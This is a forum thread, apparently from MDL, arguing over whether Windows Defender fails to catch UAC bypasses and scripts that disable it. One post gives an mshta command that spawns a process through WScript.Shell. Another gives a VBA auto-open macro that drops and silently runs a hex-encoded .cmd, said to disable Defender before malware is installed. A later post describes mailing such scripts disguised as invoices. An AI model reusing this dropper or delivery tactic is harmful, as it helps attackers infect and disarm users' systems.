Windows Defender - The worst AV ever?

Discussion in 'Application Software' started by Windows_Addict, Feb 7, 2020.

  1. chaython

    chaython MDL Novice

    Oct 2, 2011
    32
    10
    0
    If virus total doesn't detect the threat then what's anything to do to protect you? If it's already on the system and is executing without detection it could kill pretty much whatever it wants.
    For another av the virus could take ownership and force delete .sys files for the existing antivirus making windows bsod on reboot.
    If it's spyware and you have a firewall it could still loopback through firefox...
     
  2. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    #102 AveYo, Feb 15, 2020
    Last edited: Feb 15, 2020
    VirusTotal is a bit deceiving and should never be used as the sole trust factor, as most products featured don't actually trigger their heuristic/hips/sandboxing when being batch-run in vm's.
    0-day and such require hybrid analysis / sandboxing - there are several choices available online now (each with their pros and cons, rip anubis).
    Anyway, that's beside the point.
    It's not considered a threat because it is not a threat. You can't expect others being more catholic than the pope.
    "UAC is not a security boundary" -Microsoft
    But actually proper AVs installed on real machines have heuristics engines that if not blocking, at least will alert you before executing cmd from notepad from example.
    And you can't "pull the rug" from other AVs so easily - almost all of them have quite powerful defenses via kernel drivers, and not just one, but multiple redundancies.
    It takes having access to an exploitable signed driver to even begin attacking them.

    What's actually hilarious - or very sad - depending from which point you are looking, is that Defender immediately goes mad when executing stuff like this:
    Code:
    mshta "javascript:window.close(new ActiveXObject('WScript.Shell').Run('regedit.exe -m', 1, 'False'))"
    Yet it's completely fine with stuff we've showcased in this thread..
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. Windows_Addict

    Windows_Addict MDL Expert

    Jul 19, 2018
    1,245
    3,407
    60
    Relying on virus total results is a bad idea, it does not include real-time execution detection and behavioral detection, it only scans a file in a most basic way.
    A virus can be encrypted and hidden in a file, the virus total will flag it 100% clean, but the antivirus real-time protection will immediately block this threat when this software will try to extract and execute the malicious lines.

    For example, today I tested Kaspersky free against the methods to bypass WD and UAC posted in page number 5 in this thread, it blocked the UAC bypass methods instantly, it doesn't mean that it'll surely protect against every UAC bypass but apparently they have a database for such bypasses and they detect it.

    WD should have blocked the UAC bypasses and for the love of god at least .chm help file method but they don't care, others AV do, that's the whole point of this thread.

    edit - just saw that BAU posted above too.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    More troublesome is that there are dozens of so-called "penetration testing" toolkits available to automate multiple methods until succeeded - most dll-injection/msi/cmstplua/ctf/wnf ones work just fine and not even kaspersky will cover all of them.. and why should they? why should a 3rd party fix what microsoft themselves don't "elevate" (pun-intended) as being an issue?
    Nobody even bothers reporting UAC bypasses anymore, and stuff only ever gets fixed when tangentially hit by a larger issue
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  5. nosirrahx

    nosirrahx MDL Expert

    Nov 7, 2017
    1,232
    591
    60
    Not only is this true, but it becomes more true every year. It is impossible to replicate a real bare metal system and the actual attack vector used at the point of infection for the torrent of samples coming into VT so the results should be thought of a piece of the total picture, not a conclusive answer.
     
  6. Windows_Addict

    Windows_Addict MDL Expert

    Jul 19, 2018
    1,245
    3,407
    60
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  7. Krakatoa

    Krakatoa MDL Addicted

    Feb 22, 2011
    666
    1,083
    30
    example doc macro
    Code:
    Private Sub Document_Open()
        Dim i As Long
        Dim nFileNum As Integer
        Dim sFilename As String
        Dim strBytes As String
        Dim arrBytes As Variant
        sFilename = Environ("Temp") & "\d.cmd"
        strBytes = "00 00 00 ... 00 00 00"
        strBytes = strBytes & " 00 00 00 ... 00 00 00"
        arrBytes = Split(strBytes)
        nFileNum = FreeFile
        Open sFilename For Binary Lock Read Write As #nFileNum
        For i = LBound(arrBytes) To UBound(arrBytes)
            Put #nFileNum, , CByte("&H" & arrBytes(i))
        Next i
        Close #nFileNum
        Call Shell("cmd.exe /C ""%TMP%\d.cmd""", vbHide)
    End Sub
    In strBytes is d.cmd as hex.
    In d.cmd is disable defender (uac baypass included).
    Undetected.
    Functional under admin account.
    The script can continue by installing malware, the defender will already be disabled.
     
  8. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    #108 AveYo, Feb 22, 2020
    Last edited: Feb 24, 2020
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  9. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  10. Windows_Addict

    Windows_Addict MDL Expert

    Jul 19, 2018
    1,245
    3,407
    60
    Installed windows 10 2004, it seems like WD have been improved a bit to deal with unwanted applications. I noticed some changes in notifications and warnings and the way it deny to run an app.

    BAU's .cmd and .chm file method, to disable WD still working fine without warning from WD, so yeah it's still the worst AV.

    Anyone's whole system can be destroyed if someone decides to send such files over email masquerading as invoice file or some other important work related file from some companies, if properly sent, most users will download and run it. Script will then simply proceed to download malware/ransomware and execute it and all of this is very simple to do.

    It's hard to believe that almost no one in the main stream section seems to talk about such big security flaw specially when now majority runs Windows 10 and most of them rely on WD to protect the system.

    I tried to inform it to some security related sites but no response from them but they still mention how tamper protection is very effective and will save users from malware's.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  11. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    Pff. I have assumed April security patch have fixed it since it mentions a s**tload of CVEs regarding elevation of privileges and tokens manipulation, in all windows versions (even discontinued 7 got patched). So the easiest to exploit UAC backdoor still remains, it's "by design" and "wont fix". Tx, Microsoft!
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  12. shewolf

    shewolf MDL Senior Member

    Apr 16, 2015
    471
    1,065
    10
    #113 shewolf, Apr 26, 2020
    Last edited: Apr 26, 2020
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  13. Windows_Addict

    Windows_Addict MDL Expert

    Jul 19, 2018
    1,245
    3,407
    60
    Seems like you haven't tested the awesome effectiveness of the mentioned tricks to disable the Windows defender completely.

    Controlled Folder Access feature is pointless because script will disable WD and later any process can access anything. I've mentioned previously how the malicious actors can distribute such scripts to general users, easily.

    Currently my system hardware is not allowing me to test sandbox feature, but I'm pretty sure that most users who do simple browsing on the internet don't (and won't) use sandbox for that. I guess sandbox won't make a difference in order to disable the WD (running inside sandbox) with script.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  14. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    #115 AveYo, Apr 26, 2020
    Last edited: Apr 27, 2020
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  15. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    -duplicate post- delete me
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  16. shewolf

    shewolf MDL Senior Member

    Apr 16, 2015
    471
    1,065
    10
  17. shewolf

    shewolf MDL Senior Member

    Apr 16, 2015
    471
    1,065
    10
    #118 shewolf, Apr 26, 2020
    Last edited: Apr 26, 2020
    The same applies to our interaction, read the comments above, learn how to use everything your OS provides in implementing security. Windows 10 provides this option to the average user very well (then you would know what and how the script touch your OS). Instead of spending energy on scripts with no effect (or you are impressing the ignorant) get to know the capabilities of your operating system.


    PS: Dunning-Kruger Effect.

    :eek:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  18. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    Here's a picture of me, interacting: :stupid:
    Joke aside, first you are disrespecting fellow mdl users in this thread by NOT OPENING A GOD DAMN POWERSHELL AND COPY-PASTING THOSE 100 LINES TO PROVE YOUR POINT
    then you start throwing personal insults without any provocation.
    I don't care
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  19. Windows_Addict

    Windows_Addict MDL Expert

    Jul 19, 2018
    1,245
    3,407
    60
    @shewolf I've seen in WUMT, WUmgr threads how you interact with users. Anyway I'm attempting last time to reason with you.

    WD allows saving downloaded files from browsers if you put download folder in controlled folder access. Even if it doesn't, you would need to enable it so you can download things.

    Once the user click on script, whole protection will be disabled and any process can access anything in those protected folders.

    Whats there to not understand? Which point is incorrect?
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...